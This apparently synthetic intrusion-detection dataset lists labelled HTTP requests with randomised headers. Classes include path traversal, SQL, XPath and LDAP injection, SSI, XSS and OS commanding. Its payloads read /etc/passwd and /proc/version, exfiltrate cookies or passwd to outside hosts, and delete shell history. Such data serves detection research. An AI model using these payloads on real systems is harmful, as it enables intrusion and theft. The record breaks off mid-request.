If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: *
If-Range: "DX5982-v6mPIKEx"
Max-Forwards: 964
MIME-Version: 4.2
Pragma: 6mAtm9f=4njseaeI
Proxy-Authorization: Digest realm
Authorization: u4vnW ekaave=i9sui
Range: 815-,644-20793
Referer: http://www.d87Tu.ch/noOax/e38nen.bin
TE: gzip,deflate;q=0.7,trailers
Trailer: Date
User-Agent: eWBBcuDWMQ http://www.oaYr.biz
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 3.3 74.6.233.37, FTP/4.3 205.130.142.7, tn3/0.6 www.re0pe.jpeg
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 107 www.si6e.html "aijehiis7sesns5zav5" "Sun, 10 Oct 04 08:09:53 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44144
Start - Id: 46259
class: PathTransversal
GET /dD@y5/hXjqdcD7VCL/tx6I5.htm?01tS3x=4ia9&vautt1=8&p60uRKn_T=30790&hmotinn8=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&l-r@Vhy=bgsound+av%3Dur+et&cfR7hoeasarne=aOnulte&autoexecsSO5fx=4227538&swkd=dOl0ZvTP&5n0aWk=5327168&ttrsu6Ot=8%40oPiPAFz&hnSh7autkietv=Ok%3F&VHZjIM5updateTuC=7&i6fTegEudtgr=llLwwOfa7&em=14264 HTTP/1.0
Host: 75.135.229.37:31161
Connection: Xeum
Accept: text/html;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: max-stale=82
Client-ip: 190.79.101.95
Cookie: l6oOue=lnK6E
Cookie2: $Version="03"
Date: Mon, 24 Nov 08 03:43:29 GMT
ETag: "VNc9YS_adiG6@ph7"
Expect: lbdrls=ACfiR
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 19 Oct 06 21:49:57 UTC
If-Unmodified-Since: Sat, 19 Dec 09 24:35:31 CET
If-Match: "tWe1tiFLr27_nkgX"
If-None-Match: "sLmj3ROUKuDqC0iagaJ"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.9
Pragma: eiiR93Ui=wreHkyt
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: cibEh 2hct8=naasvou
Range: 5263-
Referer: /0issWn.png
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.7 (X11; U; Open BSD i586 2.6; sq-On; rv:8.5.4) Gecko/37840037
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: nidua/2.0 49.95.224.83
Transfer-Encoding: ertnn; O2a7an=qntiatja
Upgrade: roeie/1.4
Warning: 196 158.163.201.157 "scotgrnti" "Tue, 25 Mar 08 07:11:27 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46259
Start - Id: 46353
class: PathTransversal
GET /xterm./bnjua/3OoaoeEiwst/tFXbfngBY0flagG/etEq/u-ZRws1gwi/glikereplacen/eaa/oe-_oDu7rYQq71a/oE.jsp?nahbb=2Bh6p-VVg&ssr1zlyntsfpad=0407&ifldvdt3eTzRn=8oEE&goiohyiel=869924280&1tradsnaEye=4587558&iRseeade=%2F%2C%2C%2C%2Fceeol%2Fi6nk%2Fpasswd&hexecBE=eeO8dOriiea HTTP/1.0
Host: www.Ee5oeisal.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew, utf-7;q=0.2, x-mac-chinesesimp;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 246.165.10.252
Cookie: rhbet=nl(;hr=leuisnVema ?;occ=3E;1bqdriyA=t<;httpsRnc56.Jls=lbenMrteac
Cookie2: $Version="19"
Date: Thu, 10 Mar 05 01:16:47 UTC
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: esadlihc=tu29hp
From: dB62@isuoongs1.org
If-Modified-Since: Sun, 19 Sep 04 08:54:00 GMT
If-Unmodified-Since: Fri, 13 May 05 11:17:25 UTC
If-Match: "Aw1QgKMgfJRrHaYSr0a"
If-None-Match: "rKUAANKDBvP73oT"
If-Range: *
Max-Forwards: 49
MIME-Version: 1.9
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: /n1efe/uQaaen6f/ncennis.mpg
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/6.1 (compatible; MSIE 7.4; Win 9x; tjmo; 5Kwlwd6)
UA-CPU: StrongARM
UA-Pixels: 648x2225
Via: FTP/7.4 www.tstt54s4.htm:607, FTP/4.5 100.143.228.214, 6.9 www.adUe.js
Transfer-Encoding: deflate
Upgrade: 8ez/8.7, Wuay/5.7
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46353
Start - Id: 42299
class: SqlInjection
GET /agcWQ12cU/1rri3/tctnzpelein9aotAl/atnl0STusiw/rmtO7/imslIOdiotoenlhtir/s6wgttee0anaiei/itLBW6Z/execJJQUpH0TG/bflz5/ntkGyNlM22U1/nRpyhosAReHy@.aspx?atrtwraTziqlc=539004&uilnuaQtl4=sdB&locationUS9odocumentNvMq-9=chairs%27+++++UNION++SELECT+++to+++FROM+++++dba_users+++++WHERE+name++++like++%27%2525&iadyt=01 HTTP/1.1
Host: 116.218.121.129
Connection: se0utn
Accept: text/html, text/*, application/postscript
Accept-Charset: iso-8859-3;q=0.5
Accept-Encoding: gzip, compress, compress, gzip, gzip
Accept-Language: *
Cache-Control: min-fresh=030
Client-ip: 1.33.171.19
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="3"
Date: Sun, 15 Feb 04 10:02:23 CET
ETag: W/"17F1n2q6q2So7mxf"
Expect: qssn
From: eja4te@bepeeeedt.net
If-Modified-Since: Wed, 12 Jul 06 02:30:01 UTC
If-Unmodified-Since: Sun, 04 Nov 07 22:26:31 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: NTLM ZWJhOGd0aGtkRWxlYWxyY1R5dnNlczVscGhrdHJoZGtJdGMwQUVhN3I=
Range: -568889,-588214
Referer: /asjafece/3rAdycEs/aOEb/eraRhn9t.htm
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 8.1; es-ti; rv:2.1.3) Gecko/74211867
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: 8.9 www.sdre.tiff, FTP/5.4 www.6e7ilX4i.jpg
Transfer-Encoding: wtaZya; iEiNota=sh2ite
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 116.157.87.80
X-Serial-Number: 807714416153290560
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42299
Start - Id: 39919
class: SSI
POST /tno/aIu8UrKEslU4/gueadEdott0dnnolhn/rgxlda9aebfcnN9lE/ozrno7rg2tikeonn4/suae.dll? HTTP/1.0
Content-Length: 259
Content-Language: fus,e3eee,etcg
Content-Encoding: identity
Content-Location: http://tiuiwosr.org/biwrye/2rLr7s.css
Content-MD5: Y21ocnRvenRybjVpczg1aA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Apr 04 22:53:45 CET
Last-Modified: Thu, 23 Jul 09 19:55:20 UTC
Host: 201.249.213.113
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 239.36.31.16
Cookie: wiasorbreopueet=3
Cookie2: $Version="724"
Date: Thu, 08 Sep 05 23:51:24 CET
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Thu, 15 Jun 06 08:09:57 GMT
If-Unmodified-Since: Sun, 05 Feb 06 04:13:50 UTC
If-Match: *
If-None-Match: "S8jwtcrJR3cTv9_"
If-Range: "10khbgQprWoU-9QDKDXF"
Max-Forwards: 82
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: /tweww/wysotTft/skl5msO/wfoli.png
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/7.0 (compatible; Konqueror/8.5; Linux i586; 1ns94adra)
UA-CPU: StrongARM
UA-Disp: 079,5438,8
UA-OS: Win9x
UA-Color: color16
Via: 0.8 193.69.194.244
Transfer-Encoding: areae; hi6ivrg=otTAo5e
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

arwosisupbde=i&wbupqvbscript7=69098084&td9ee1eNenio=hEmXAqQcXSH&Atom4dnhr8tth=ibm%httpsm2eSbrhtv&iioualmlss9za=st&sjlwoottnre=<!--     #exec   cmd="/bin/mail     mzbm.com    <    /etc/passwd"-->&rs2exti6e=3&rtaAASd=s/optiosgnnfqry6

End - Id: 39919
Start - Id: 42684
class: SqlInjection
GET /chTrtqn0skoiero/sw0gearfeceio/mnctTB/AQ6B/kjBO_j04IJAnrV39svU/atluoErom.aspx?eohe=eiiMl%40p%3AiaO31eW6%28o&apPueehenor=4139905201&CDcTGM=936&trhttwble9n4rib=nuthiCt&HrIorent=56&fiael4e=98410&rmaMswbnto7oi=084752&oUcGSnLZIAN=6334&pS6o9Hov=082490447&trsDinhm=select++prya+++++from+ALL_USERS&octt62osmd1iU=zm3me HTTP/1.0
Host: 165.134.153.69
Connection: close
Accept: video/*;q=0.1, audio/*, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.3, identity
Accept-Language: osc0-4eslm, lg4KeseO-ra3d;q=0.0, Fb-cano;q=0.0, eEe55enc-entend4;q=0.6
Cache-Control: no-store
Date: Fri, 23 Apr 04 07:17:22 CET
Expect: 100-continue
If-Modified-Since: Fri, 26 Mar 10 05:07:07 GMT
If-Unmodified-Since: Tue, 15 Jan 08 02:56:58 UTC
If-Range: Fri, 26 Jan 07 06:49:20 UTC
Max-Forwards: 1
Authorization: Basic d2NzZWhvbWc6ZWlhYg==
Range: 8-
Referer: /suee/irfo/hd7o.gz
User-Agent: Mozilla/7.8 (Windows; U; WinNT 4.8; ny-sb; rv:3.7.9) Gecko/22329361
UA-Pixels: 6446x354
Via: 6.8 www.ljen.js, 9.1 www.i0re3.css, 0.8 97.1.37.124:6
X-Serial-Number: 13324951169307701

null

End - Id: 42684
Start - Id: 35848
class: XPathInjection
GET /uXJ5/orQflK/iqs/speeLne5iRnahtole/e0ex2eNsv6/4KYoxO@KsQOreJ/l870N7sDNJUL2/tGfK70f7Ol9BJiDK0/n5srcfzhaayioo.jpeg?ry8t=ltpTTuApassthrug&iiem=tcr%7EnhdEg5%29y&ce6pgH=ab%28e&ii1de=jpsehnsnoEsn&peenesbyrcvzte=yIb%27++++or+++et8m%2Fh%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D13%5D++++or++++%27oriuf%27++%3D++%27&vseS=47943&gnkregdesis=yoeMe6fyocd&yeeQduelo7mrg=5448&@divmMLnhw=3&eaiefatn=olmtnewam&ltn8ud=rqROQAt&I1cp=tGV&c98rrnwctih=g6tc8Dt%24aperlCedmd&3seD=Adagodn&6fsVr5u=Tunnse HTTP/1.1
Host: www.nLnetUtai.com
Connection: keep-alive
Accept: video/*, audio/*;q=0.2
Accept-Charset: x-mac-cyrillic;q=0.1, big5
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.7
Cache-Control: r8sg='t'
Client-ip: 177.161.53.181
Cookie: roshst=ddhPeuuf'ara8;bvt=tuWeh;lPhdea=1243929390
Cookie2: $Version="398"
Date: Wed, 14 Apr 10 08:21:42 GMT
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: iasENO
From: wcsotyes@fnolepci.st
If-Modified-Since: Mon, 13 Dec 04 19:03:32 CET
If-Unmodified-Since: Fri, 14 Jan 05 21:20:23 CET
If-Match: "uVEX3euv.sny8oVnf5Sk"
If-None-Match: *
If-Range: Sun, 29 Jan 06 04:01:31 UTC
Max-Forwards: 710
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest username="ioula3"
Authorization: NTLM bnRvT2ppUlFhYmhwb25pdHU0b2NlZUZyMGVpaHJsYXllaXdvTmU=
Range: -15
Referer: http://ot5htI.st/sto0/ezical.php4
TE: gzip,gzip
Trailer: Authorization
User-Agent: nceeoteinvewesdCa8t
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: HTTP/5.6 www.tct9dpg.gif
Transfer-Encoding: gzip
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35848
Start - Id: 43538
class: OsCommanding
GET /lhnjie2tir/tXV/zAj/ecupBTOSnut-3/rjhehrhInelwthd/sznaEo8hefcecilpS/deAiosqee1ti3.jpg?tachdyltn=s_wnD-K&m0aOmClc=u5Id8m4&gnryopasswk=634787&hseEmtmE=eafyNd5t&xn=nis&ntuonea=%27%3B++rm++++%7E%2F.bash_history+%3B&eu=esc5%7CIir&ye=ghesmtsthenls1&re=78624997&CEsla46ves3y=8518&jba5=t&pj3e=ostm&meoiGeihshtc=hxtermtlibe+bsystem%5Bpsetc HTTP/1.0
Host: www.thhotvtirn.it:1527
Connection: keep-alive
Accept: text/*
Accept-Charset: iso-8859-15, euc-jp, windows-1257;q=0.8, x-mac-arabic;q=0.5, iso-8859-1;q=0.4
Accept-Encoding: identity;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 214.70.1.175
Cookie: 3uedropbE=9208;IM1tagrrr=hap-Ca;weobfrl1tc=yT8 sio e$v
Cookie2: $Version="9"
Date: Mon, 11 Jun 07 10:55:29 CET
ETag: W/"IRDWyMlE6.clcPc7DJep"
Expect: hhdoic
From: kewtae@taheisd.de
If-Modified-Since: Mon, 11 Feb 08 09:41:16 UTC
If-Unmodified-Since: Mon, 12 Apr 04 06:57:00 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: Fri, 07 Apr 06 06:14:10 CET
Max-Forwards: 9790
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Digest nc=69affcF6
Range: -983461,45-31195
Referer: /ict9erso.tiff
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/1.7 (X11; U; Linux i586 5.8; tt-xa; rv:9.4.4) Gecko/37761685
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5688x504
Via: HTTP/6.5 187.108.152.187
Transfer-Encoding: identity
Upgrade: 5aRp/4.4, fqts/9.9, eeo/3.4, hho/0.4, pitko/1.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43538
Start - Id: 40609
class: SSI
GET /tMCp@XiLm05/athitmiedq/oDXZ_Ic/iw1union08zZ7CE/nfoSnT/yqdeet6Qv9rulnRibsny/mrxeuiocmtstuwuvrcim/d1DyeIlT/trer/oKSC/lieicWo.asp?zah4io=%3C%21--+++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.0
Host: 116.120.79.10
Connection: jegpb
Accept: audio/*;q=0.4, text/*;q=0.1
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 146.4.65.176
Cookie: CBLFa=eIdrst;3MOO_8g@v_J= eO;nuemotmcz89e7a=uata>sh\xi |ff;wnsgrotgiewfcg=c;ahnkrt=186187;ikelS=2eti
Cookie2: $Version="0"
Date: Wed, 27 Jul 05 24:26:41 GMT
ETag: W/"hRpE5sdLGOIMRDDGsThB"
Expect: 100-continue
From: q67lte@ielenft.it
If-Modified-Since: Wed, 14 Feb 07 07:04:38 GMT
If-Unmodified-Since: Thu, 10 Jun 04 17:25:28 CET
If-Match: "D11xxMOuagBnAt8sG"
If-None-Match: "wC3Hs4qqwNKVk6i81"
If-Range: "DhNRDE3.PKXg4A5TyA"
Max-Forwards: 391
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: bcfrun ebAc=Lgatnzn
Authorization: NTLM cnRhaTUydHNldGx6Ymk4SWI5aHllZGRsaWd0cm5ibmNlaUVjZ2llZG9u
Range: -7,-7178,-26215
Referer: /7eEgstrh/ooyrtvL/xofw.js
TE: gzip;q=0.3,gzip
Trailer: Expect
User-Agent: Mozilla/8.9 (compatible; Konqueror/2.6; Win 9x; Tso79o; ssn2eoon; Xdhbadilea)
UA-CPU: PowerPC
UA-Disp: 252,6478,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 1.9 79.187.123.114:3936
Transfer-Encoding: gzip
Upgrade: crlln/8.7, m6mMa/6.8, ehdTt/0.9, Rtiaun/0.7
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 5.3.246.86
X-Serial-Number: 431541377
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40609
Start - Id: 37397
class: LdapInjection
GET /aofyflljahoero/tkuQb89ENM/9_F2RMCPPZZ/tRG-4Zay7epjJ5N-q_/Hs5txailzoysn/eibrxDprcedx7a.png? HTTP/1.0
Host: 76.35.135.103
Connection: close
Accept: */*;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.6
Cache-Control: no-transform
Cookie: tscuodrKnnl=)   (  |  (e1t=elih*)
Cookie2: $Version="494"
If-Range: Fri, 18 Feb 05 16:10:05 CET
Max-Forwards: 0785
Pragma: no-cache
Range: 92271-,85-
Referer: http://aaeqk.gov/ebaata/hreeror/oh3esa/s8otm/terltr.jpeg
User-Agent: Mozilla/2.6 (compatible; Konqueror/3.0; Mac OS X; saar; 0xadnraem)
Via: HTTP/4.8 www.ievdnW5.png
Upgrade: ontd/7.5, eEr1lt/2.5

null

End - Id: 37397
Start - Id: 47608
class: XSS
GET /nwJcC3KFBW5_dHXRL/releegpa2vnsmd3tsVv/ieu8otilpzbemsshlp/efr/d8ZSU/swuatfslroyjhhs/rlo0rlldihjeierg/cs.@wB/kwmsthsygowocaoo.htm?WOBMsm1U=aOGNF&oiriuRlDfsiont=ae&tfQr1IaOxsv=vxti1N&orfbae=%3Cimg++src+++%3D%22tiritana++%3E%22+++++onmouseover++%3D+++%22++++%5Balert%28%27ige1nimns%27%29%3B%5D++%22++%3E HTTP/1.1
Host: www.mlTqya7ts.st
Connection: eXsctut3
Accept: text/*;q=0.6, audio/x-wav
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, gzip;q=0.5, deflate, identity;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 184.172.160.38
Cookie: _sAkO=sZsz;ndrfexSaeer5=ekYJ_U@C_K;jEzsRlis=169839;rudasc=5103106;9reldkd=uiuteMra
Cookie2: $Version="75"
Date: Thu, 19 Jan 06 16:06:49 GMT
ETag: W/"X.RcC5gc4wa038H6"
Expect: pUonr4u1
From: b5GeiRai@2s2t.st
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: *
If-None-Match: "WPHcRLmW-ERw0l_AnF1"
If-Range: Sun, 27 Feb 05 02:21:29 GMT
Max-Forwards: 8
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 393273-
Referer: /4o6nc.fgf
TE: trailers,gzip;q=0.9,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.0 (X11; U; Solaris 3.4; ao-To; rv:7.9.6) Gecko/76106633
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 5.5 134.39.107.235, 0.0 www.t4en.js:145
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47608
Start - Id: 35713
class: XPathInjection
GET /Pqh/ts4m.DYb/t-qL7/BcKGo4dAR/omgsamb9_SHE.bin?eiern=xmltht4cs9y2i8onl&cdlV2c05yp=6TSdi%27%5D++%7C++P+++++%7C++++%2F%2Fuser%5B++++name%2Ftext%28+%29%3D++++%27b7&ht1=wtgds&E2j6niie=Husservicesaozs5nE&w6r0NNhef=ytSqomweenh&rttrpwN0tG=jaufplrx5i&ihpmencna=tioAsOtd2qeR&r6=028&t8ndr=%7Eis&rosxtGsh=86&e0a1MReLqs51=2&in6pr=al&6aKoIrkjeeEaee=mSt1EmaobcRou&mp=hb%5CfromaR%7ETEg%28+%3Bor%3Enda HTTP/1.0
Host: www.nltc.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 144.129.84.108
Cookie: suctdehsisY=9o= 
Cookie2: $Version="48"
Date: Fri, 24 Sep 04 13:12:48 GMT
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Sat, 09 Aug 08 12:20:43 CET
If-Unmodified-Since: Sat, 18 Apr 09 09:39:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 198
MIME-Version: 8.0
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Basic ZXllYTc6dHNuMA==
Authorization: Digest nonce
Range: 5225-,8-9,1-
Referer: http://n6u8dn.uk/enhe.mdb
TE: trailers,deflate
Trailer: TE
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 0.3; nj-mu; rv:0.5.3) Gecko/12814402
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: HTTP/5.9 www.0rwrNh.jpg:7, yude/2.0 10.38.47.102:78
Transfer-Encoding: identity
Upgrade: d3ec/2.6, tifat/9.6
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35713
Start - Id: 46914
class: XSS
POST /sK3iIH62Z7E/ehnphmu9c46hknoms0e/r33cDqERbvVok1dCDG.mdb? HTTP/1.1
Content-Length: 205
Content-Language: p,oAtsa,taa6
Content-Encoding: compress
Content-Location: http://www.8hOluhW.gov/c6rdlThg/niRa8/2slrtr.nsf
Content-MD5: dGlhYmRneXhsN2QzdHoyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sun, 25 Jan 04 14:56:32 UTC
Host: 143.175.174.33
Connection: keep-alive
Accept: text/*
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: 
Accept-Language: cnau6p-rehS2Dio, gr-La, xene5a1m-n4a, osE-mewri, adthte-hz;q=0.7
Cache-Control: no-cache
Client-ip: 67.18.221.141
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
Cookie2: $Version="1"
Date: Sat, 29 May 04 01:22:21 UTC
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Wed, 28 Apr 04 01:03:42 UTC
If-Match: *
If-None-Match: "fVGh6Hz4BFoC-uY8Hu"
If-Range: Sat, 29 Apr 06 03:10:29 CET
Max-Forwards: 15
MIME-Version: 9.1
Pragma: 40srph='ismjai'
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM bnNyZ2xzaGVIbjludGVpYXNoZG5ob2lhZW50RWNoYzRlb21yTnQ=
Range: -790
Referer: http://eot0lfN.gov/6clun/ee2n/eiiAd4o/tvaNe.wav
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ddbsdoNikeCsd
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 537x7894
Via: 7.1 www.mRerr7t3.jpg, 4.0 177.44.101.16, HTTP/6.0 92.30.98.233
Transfer-Encoding: 2gtilt
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

LudQX@k=<link rel =  "     stylesheet   "   href   ="     javascript: [window.open('http://245.178.53.167/ntie.jsp'+document.cookie);]    "    >&osreo22le=18096561

End - Id: 46914
Start - Id: 43761
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.yarw.gov:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: cp-950, cp-932, x-mac-japanese, koi8, x-mac-icelandic;q=0.7
Accept-Encoding: 
Accept-Language: Hakr-O;q=0.6, iui1t2-drrcwnE, leeOe-aaotm, uuruon-t
Cache-Control: no-cache
Client-ip: 255.84.192.160
Cookie: vAooiI=jTu6o;tzzictTnaE8tlaf=nYWA;vfilspe5soar=eeaenippipa2itezl
Cookie2: $Version="1"
Date: Sun, 08 Nov 09 21:50:11 GMT
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: wspr4ebT
From: Roarg8@ntrfj.uk
If-Modified-Since: Fri, 03 Jun 05 08:30:18 GMT
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Digest opaque="0s1iie9e"
Range: -541349,6-1
Referer: http://www.ejNsoio5.com/t2tn/ni4yhjc/Elhbsre/pzsne/sol2enE.swf
TE: deflate,deflate,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 9.2; ni-2l; rv:6.9.7) Gecko/58254896
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5283x402
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: identity
Upgrade: yhotE/7.5, Kihlr/2.4
Warning: 817 www.ntpiq.tiff "GhTia" "Thu, 28 Jan 10 03:22:21 UTC"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 036162640155
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43761
Start - Id: 48568
class: XPathInjection
PUT /4Wlu@u5q/wjacracmenwahfea/fIUrittSeq7Emihhdr/ekoqsb83csLupl4.tiff? HTTP/1.1
Content-Length: 243
Content-Language: fof4po,nebahawt
Content-Encoding: deflate
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: dGFsOTlleWFobGVvb0VldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 May 08 19:49:44 GMT
Last-Modified: Wed, 31 Mar 10 02:40:37 CET
Host: 241.197.125.142:685
Connection: a6l5ah
Accept: */*;q=0.0
Accept-Charset: windows-1255;q=0.4, iso-8859-2;q=0.3, macintosh;q=0.4
Accept-Encoding: compress;q=0.9
Accept-Language: l-sx, ss-A;q=0.2, ileelY-40tj
